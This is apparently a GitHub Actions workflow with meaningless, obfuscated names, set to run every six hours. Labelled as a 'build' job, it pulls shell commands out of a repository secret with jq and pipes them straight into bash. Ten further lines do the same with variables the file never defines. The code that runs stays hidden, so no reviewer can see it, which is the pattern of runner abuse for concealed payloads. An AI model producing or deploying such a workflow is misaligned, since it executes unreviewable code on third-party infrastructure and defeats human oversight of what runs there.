name: tianguxoa

on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tianguxoa
        env:
          cqpb5646: ${{ secrets.cqpb5646 }}
        run: |
          echo $cqpb5646 | jq -r .qoqej32501 | /bin/bash
          echo $h3 | jq -r .t30329 | /bin/bash
          echo $rqyxr6419 | jq -r .xdod88547 | /bin/bash
          echo $jxka3028 | jq -r .s75 | /bin/bash
          echo $x225 | jq -r .hhj750 | /bin/bash
          echo $jkq1122 | jq -r .q3370 | /bin/bash
          echo $dujdy5 | jq -r .qzcre6 | /bin/bash
          echo $oynap0 | jq -r .xcqw80 | /bin/bash
          echo $f8 | jq -r .uz89771 | /bin/bash
          echo $jeb8 | jq -r .b4 | /bin/bash
          echo $fad14 | jq -r .c0065 | /bin/bash

